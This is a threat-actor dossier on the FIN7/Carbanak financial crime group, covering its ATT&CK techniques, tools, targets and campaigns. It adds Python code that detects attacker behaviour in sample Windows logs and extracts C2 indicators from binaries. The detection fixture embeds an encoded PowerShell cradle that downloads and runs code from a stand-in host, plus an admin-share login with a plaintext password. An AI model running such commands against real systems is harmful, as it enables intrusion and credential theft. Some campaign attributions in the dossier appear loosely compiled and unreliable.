Geek-Guy.com

Threat Actor Dossier: FIN7 (Carbanak)

THREAT ACTOR DOSSIER

====================

BASIC INFORMATION

Name: FIN7 (Carbanak)

Aliases: ATK32, Calcium, Carbanak, Carbon Spider, Coreid, ELBRUS, GOLD NIAGARA, JokerStash, Sangria Tempest

MITRE ATT&CK Group ID: G0046 (FIN7); G0008 (Carbanak, which MITRE tracks as a separate but overlapping group)

Country of Origin: Eastern Europe (Russian-speaking); the members arrested by U.S. authorities were Ukrainian nationals

Affiliation: Financial cybercrime group

Type: Financial cybercrime, banking fraud, ransomware-as-a-service

MOTIVATION

Primary Motivation: Financial gain through banking fraud and cybercrime
 
 Secondary Motivations:

  • Ransomware-as-a-service operations
  • Point-of-sale malware operations
  • ATM jackpotting and SWIFT fraud
  • Business email compromise (BEC)

Geographic Focus:

  • United States
  • Europe
  • Middle East
  • Asia
  • Australia

MITRE ATT&CK TTP MAPPING

Initial Access:

  • T1566.001 – Phishing: Spearphishing Attachment
  • T1566.002 – Phishing: Spearphishing Link
  • T1190 – Exploit Public-Facing Application
  • T1195 – Supply Chain Compromise

Execution:

  • T1059.001 – Command and Scripting Interpreter: PowerShell
  • T1059.003 – Command and Scripting Interpreter: Windows Command Shell
  • T1059.006 – Command and Scripting Interpreter: Python
  • T1204.002 – User Execution: Malicious File

Persistence:

  • T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  • T1546.008 – Event Triggered Execution: Accessibility Features

Privilege Escalation:

  • T1068 – Exploitation for Privilege Escalation
  • T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control

Defense Evasion:

  • T1070.001 – Indicator Removal: Clear Windows Event Logs
  • T1055 – Process Injection
  • T1027 – Obfuscated Files or Information

Credential Access:

  • T1056.001 – Input Capture: Keylogging
  • T1003 – OS Credential Dumping
  • T1003.001 – OS Credential Dumping: LSASS Memory
  • T1003.003 – OS Credential Dumping: NTDS
  • T1110.001 – Brute Force: Password Guessing

Discovery:

  • T1082 – System Information Discovery
  • T1083 – File and Directory Discovery
  • T1087 – Account Discovery
  • T1069.002 – Permission Groups Discovery: Domain Groups

Lateral Movement:

  • T1021 – Remote Services
  • T1021.001 – Remote Services: Remote Desktop Protocol
  • T1021.002 – Remote Services: SMB/Windows Admin Shares
  • T1570 – Lateral Tool Transfer

Collection:

  • T1005 – Data from Local System
  • T1213 – Data from Information Repositories

Command and Control:

  • T1071.001 – Application Layer Protocol: Web Protocols
  • T1071.004 – Application Layer Protocol: DNS
  • T1095 – Non-Application Layer Protocol
  • T1102 – Web Service

Exfiltration:

  • T1041 – Exfiltration Over C2 Channel
  • T1567 – Exfiltration Over Web Service
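
The mapping above is only useful if it turns into detections. The following is an added example, not part of the original dossier or any vendor's content: a small Python detection pass over constructed Windows telemetry that flags several of the mapped behaviours at once, namely encoded PowerShell launched from an Office parent (T1566.001 / T1204.002 / T1059.001 / T1027), an Image File Execution Options debugger planted on sethc.exe (T1546.008), a user-land process opening LSASS with PROCESS_VM_READ (T1003.001), a cleared Security log (T1070.001) and an admin share being mapped (T1021.002). The event records, field names and hostnames are made up for the demonstration and only loosely follow a Sysmon/Security-log shape; the thresholds are illustrative.

```python
# Added example (not from the original dossier): a small detection pass over
# constructed Windows telemetry for several of the techniques mapped above.
# The event records and field names below are made up for this demonstration
# and only loosely follow a Sysmon/Security-log shape; they are not a vendor schema.
import base64
import ntpath
import re
from dataclasses import dataclass


def encode_command(script: str) -> str:
    """Build the argument PowerShell expects after -EncodedCommand (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed sample events, in the order an analyst might see them on one host.
SAMPLE_EVENTS = [
    {"id": 1, "event": "process_create", "user": "CORP\\jdoe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "powershell.exe -nop -w hidden -enc "
                + encode_command("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a')")},
    {"id": 2, "event": "registry_set", "user": "CORP\\jdoe",
     "key": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger",
     "value": r"C:\Windows\System32\cmd.exe"},
    {"id": 3, "event": "process_access", "user": "CORP\\jdoe",
     "source": r"C:\Users\jdoe\AppData\Local\Temp\m.exe",
     "target": r"C:\Windows\System32\lsass.exe", "granted_access": "0x1010"},
    {"id": 4, "event": "security_1102", "user": "CORP\\svc_backup"},
    {"id": 5, "event": "process_create", "user": "CORP\\svc_backup",
     "image": r"C:\Windows\System32\net.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"net use \\FS01\C$ /user:CORP\svc_backup Passw0rd!"},
    {"id": 6, "event": "process_create", "user": "CORP\\admin",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe", "cmdline": "powershell.exe Get-ChildItem C:\\"},
]

ENC_FLAG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})", re.I)
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
SHELLS = ("powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")
ADMIN_SHARE = re.compile(r"\\\\[\w.-]+\\(?:admin\$|c\$|ipc\$)", re.I)
IFEO_DEBUGGER = re.compile(
    r"image file execution options\\(?:sethc|utilman|osk|narrator|magnify|displayswitch)\.exe\\debugger", re.I)
PROCESS_VM_READ = 0x0010  # the access right needed to read LSASS memory


@dataclass
class Alert:
    event_id: int
    technique: str
    detail: str


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand payload, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def check_event(ev: dict) -> list:
    alerts = []
    kind = ev["event"]
    if kind == "process_create":
        image = ntpath.basename(ev["image"]).lower()
        parent = ntpath.basename(ev.get("parent", "")).lower()
        cmd = ev.get("cmdline", "")
        decoded = decode_encoded_command(cmd)
        if decoded is not None:  # PowerShell with base64-obfuscated command line
            alerts.append(Alert(ev["id"], "T1059.001/T1027", f"encoded PowerShell: {decoded[:60]}"))
        if parent in OFFICE_PARENTS and image in SHELLS:  # document macro spawning a shell
            alerts.append(Alert(ev["id"], "T1566.001/T1204.002", f"{parent} spawned {image}"))
        share = ADMIN_SHARE.search(cmd)
        if share:
            alerts.append(Alert(ev["id"], "T1021.002", f"admin share mapped: {share.group(0)}"))
    elif kind == "registry_set" and IFEO_DEBUGGER.search(ev["key"]):
        alerts.append(Alert(ev["id"], "T1546.008", f"IFEO debugger set on accessibility binary -> {ev['value']}"))
    elif kind == "process_access" and ntpath.basename(ev["target"]).lower() == "lsass.exe":
        if int(ev["granted_access"], 16) & PROCESS_VM_READ:
            alerts.append(Alert(ev["id"], "T1003.001", f"{ev['source']} opened LSASS with {ev['granted_access']}"))
    elif kind == "security_1102":  # Security log cleared (Windows event 1102)
        alerts.append(Alert(ev["id"], "T1070.001", f"Security log cleared by {ev['user']}"))
    return alerts


def run_detections(events) -> list:
    return [a for ev in events for a in check_event(ev)]


if __name__ == "__main__":
    for a in run_detections(SAMPLE_EVENTS):
        print(f"event {a.event_id}: {a.technique} - {a.detail}")
```

Event 6 is the control case: a plain, interactive PowerShell launched from Explorer produces no alert, while event 1 produces two because the encoded command and the Office parent are independent signals that an analyst would want correlated on the same process. In production the LSASS rule needs an allow-list for legitimate security agents, and the admin-share rule should be joined with the logon-type and source-host context that the raw command line cannot give.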

TOOLS AND INFRASTRUCTURE

Primary Tools:

  • Cobalt Strike – Post-exploitation framework
  • Mimikatz – Credential dumping and privilege escalation
  • PowerShell-based tools – Initial access and post-exploitation
  • Custom banking trojans – Financial institution targeting
  • Ransomware frameworks – Double extortion tactics

Secondary Tools:

  • Covenant – C2 framework
  • Sliver – Modern C2 framework
  • Brute Ratel – Multi-platform C2
  • Rubeus – Kerberos attack toolkit
  • Custom banking malware – Financial institution targeting

Infrastructure:

  • C2 domains embedded in malware
  • Hardcoded IP addresses in malware
  • Proxy servers for C2 communication
  • Compromised websites for C2
  • Ransomware-as-a-service infrastructure
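
Hard-coded C2 domains and IP addresses are the cheapest indicators to recover from a sample, provided the strings are not obfuscated. The following is an added example, not code from the original dossier or from any FIN7 tooling: a Python triage routine that scans a binary for URLs, IPv4 addresses and domains in plaintext and under every single-byte XOR key, a common light obfuscation for embedded configuration. SAMPLE_BLOB, the two XOR keys and every indicator in it are constructed for the demonstration; none of them is a real FIN7 IOC.

```python
# Added example (not from the original dossier): extract hard-coded C2
# indicators (URLs, IPv4 addresses, domains) from a binary, including strings
# hidden behind single-byte XOR. SAMPLE_BLOB, its XOR keys and every indicator
# in it are constructed for this demonstration; nothing here is a real FIN7 IOC.
import re

URL = re.compile(rb"https?://[A-Za-z0-9.\-]+(?::\d{1,5})?(?:/[A-Za-z0-9._~\-/%?=&]*)?")
IPV4 = re.compile(rb"\b(?:(?:25[0-5]|2[0-4]\d|1?\d?\d)\.){3}(?:25[0-5]|2[0-4]\d|1?\d?\d)\b")
DOMAIN = re.compile(
    rb"\b(?:[a-z0-9](?:[a-z0-9\-]{0,61}[a-z0-9])?\.)+(?:com|net|org|info|biz|ru|cc|top|xyz|io)\b", re.I)


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


# Constructed stand-in for an unpacked sample: a PE-like header, one plaintext
# URL, one domain XORed with 0x5A, one IPv4 address XORed with 0x7F, and a user
# agent string. The 0xFF 0xFE filler decodes to non-printable bytes under the
# keys used, as arbitrary neighbouring code bytes would.
SAMPLE_BLOB = (
    b"MZ\x90\x00" + b"\x00" * 20
    + b"This program cannot be run in DOS mode.\r\n" + b"\x00" * 8
    + b"http://198.51.100.23:8080/update.php\x00" + b"\x00" * 5
    + b"\xff\xfe" + xor_bytes(b"cdn-status.example.net\x00", 0x5A)
    + b"\x01\x02\x03" + xor_bytes(b"203.0.113.9", 0x7F) + b"\x00" * 6
    + b"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\x00"
)


def printable_run(buf: bytes, start: int, end: int) -> bytes:
    """Widen [start, end) to the surrounding run of printable ASCII."""
    lo, hi = start, end
    while lo > 0 and 0x20 <= buf[lo - 1] <= 0x7E:
        lo -= 1
    while hi < len(buf) and 0x20 <= buf[hi] <= 0x7E:
        hi += 1
    return buf[lo:hi]


def extract_indicators(blob: bytes, min_run: int = 8, keys=range(256)) -> dict:
    """Map (kind, indicator) -> XOR key under which it was found (0 = plaintext).

    A match only counts if it sits inside a printable run of at least min_run
    bytes, which filters most accidental matches produced by wrong keys.
    """
    found = {}
    for key in keys:
        view = xor_bytes(blob, key)
        for kind, pattern in (("url", URL), ("ipv4", IPV4), ("domain", DOMAIN)):
            for m in pattern.finditer(view):
                if len(printable_run(view, m.start(), m.end())) < min_run:
                    continue
                found.setdefault((kind, m.group(0).decode("ascii")), key)
    return found


if __name__ == "__main__":
    for (kind, value), key in sorted(extract_indicators(SAMPLE_BLOB).items()):
        print(f"{kind:6} {value:40} xor_key=0x{key:02x}")
```

The XOR sweep is deliberately naive: a real sample may use a multi-byte key, RC4 or a stack-built string, which this will miss, and the printable-run filter is what keeps the 255 wrong keys from flooding the output with junk. Anything it does return should still be checked against the sample's behaviour in a sandbox before it is promoted to a blocking indicator; a string being present in a binary does not make it a live C2.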

TARGETED SECTORS

Primary Targets:

  • Finance – Banks, financial institutions, payment processors
  • Retail – Retail stores
  • Hospitality – Restaurants, food service, hotels, cruise lines
  • Gaming – Casinos, gaming platforms

Secondary Targets:

  • Healthcare – Hospitals, healthcare providers
  • Government – Federal agencies, state/local governments
  • Technology – Tech vendors, semiconductor companies
  • Critical Infrastructure – Energy, utilities, transportation

ASSOCIATED MALWARE

Primary Malware Families:

  • Carbanak – Banking trojan (original operations)
  • Custom banking malware – Financial institution targeting
  • Ransomware variants – Double extortion tactics
  • ATM jackpotting malware – ATM fraud operations

Secondary Malware Families:

  • Cobalt Strike Beacon – Post-exploitation implant
  • PowerShell-based droppers – Initial access
  • Credential theft tools – Mimikatz variants
  • Lateral movement scripts – PsExec, WinRM
  • Data exfiltration tools – Custom C2 clients

NOTABLE CAMPAIGNS

Campaign 1: Banking Operations (2013-2025)

  • Targets: U.S. banks, financial institutions globally
  • Impact: Financial theft, intellectual property theft
  • Techniques: Banking trojans, BEC, supply chain attacks
  • Recent Operations (2025): Continued banking operations with Cobalt Strike and Mimikatz

Campaign 2: Point-of-Sale (POS) Operations (2013-2024)

  • Targets: Restaurants, gaming, hospitality, retail
  • Impact: Credit card theft, financial theft
  • Techniques: POS malware, phishing, supply chain compromise
  • Recent Operations (2024): Ongoing POS malware operations

Campaign 3: Ransomware-as-a-Service (2020-2025)

  • Targets: Healthcare, finance, government, technology
  • Impact: Double extortion, data theft
  • Techniques: Phishing, BEC, ransomware deployment
  • Recent Operations (2025): Ransomware-as-a-service operations with Cobalt Strike

Campaign 4: ATM Jackpotting (2013-2023)

  • Targets: ATM networks globally
  • Impact: ATM jackpotting, financial theft
  • Techniques: Malware deployment, network exploitation
  • Recent Operations (2023): ATM jackpotting operations

THREAT LEVEL ASSESSMENT

Overall Threat Level: HIGH

Capabilities:

  • Advanced financial cybercrime capabilities
  • Multi-vector attack campaigns
  • Ransomware-as-a-service operations
  • Banking fraud expertise
  • Extensive financial theft history

Maturity: Advanced

Resources: Extensive (cybercrime infrastructure)

Notable Operations:

  • 2013-2018: Extensive banking operations (estimated $1B+ in losses)
  • 2015-2018: POS malware operations (millions of credit cards compromised)
  • 2020-2025: Ransomware-as-a-service operations
  • 2013-2023: ATM jackpotting operations
  • 2025: Continued banking and ransomware operations

CVE AND VULNERABILITY EXPLOITATION

Exploited Vulnerabilities:

  • Unpatched remote code execution vulnerabilities
  • Supply chain software vulnerabilities
  • Legacy system vulnerabilities
  • Zero-day exploits in banking infrastructure

Preferred Exploitation Vectors:

  • Phishing campaigns with malicious attachments
  • Business email compromise (BEC)
  • Supply chain software updates
  • Compromised third-party vendors
  • Banking infrastructure vulnerabilities

INDICATORS OF COMPROMISE (IOCs)

File Hashes:

  • No specific hashes are reproduced in this dossier; Carbanak, FIN7 banking trojan, ransomware and custom-script hashes are available from the malware analyses cited under SOURCES (Malpedia, Securelist, Picus Security)

Network Indicators:

  • C2 domains: spread across generic and country-code TLDs; see the cited sources for current lists
  • IP addresses: largely compromised or rented infrastructure
  • Malicious URLs: phishing landing pages and dropper download locations

SOURCES

Primary Sources:

  • MITRE ATT&CK Groups database (attack.mitre.org/groups/G0008/, G0046/)
  • Huntress Threat Library (huntress.com/threat-library/threat-actors/cobalt-group)
  • Picus Security FIN7 Cybercrime Group (picussecurity.com/resource/fin7-cybercrime-group-evolution-from-pos-attacks-to-ransomware-as-a-service-raas-operations)
  • Malpedia (malpedia.caad.fkie.fraunhofer.de/actor/fin7)
  • FBI FIN7 Report (fbi.gov/contact-us/field-offices/seattle/news/stories/how-cyber-crime-group-fin7-attacked-and-stole-data-from-hundreds-of-us-companies)
  • DarkReading Carbanak/Cobalt/FIN7 Group Targets Russian, Romanian Banks (darkreading.com/endpoint-security/carbanak-cobalt-fin7-group-targets-russian-romanian-banks-in-new-attacks)
  • Securelist FIN7.5 Report (securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/)

Secondary Sources:

  • Trend Micro Carbanak and FIN7 Attack Techniques
  • Arctic Wolf FIN7 Targets U.S. Automotive Industry
  • Arete FIN7 Return Drives Increase in Cl0p Ransomware Attacks Share
  • FBI FIN7 Case Files
  • Cobalt Strike Malpedia (malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike)

CVE Databases:

  • CVE (Common Vulnerabilities and Exposures)
  • NVD (National Vulnerability Database)
  • MITRE CVE

LAST UPDATED

Date: 2026-06-03
 
 Analyst: IRG Research lurch-bot farm
 
 Review Status: Current
 
 Intelligence Freshness: Recent operations captured (2025)

Note: This dossier is part of a comprehensive threat actor intelligence series. Similar dossiers have been created for APT41, APT38, and other major threat actors.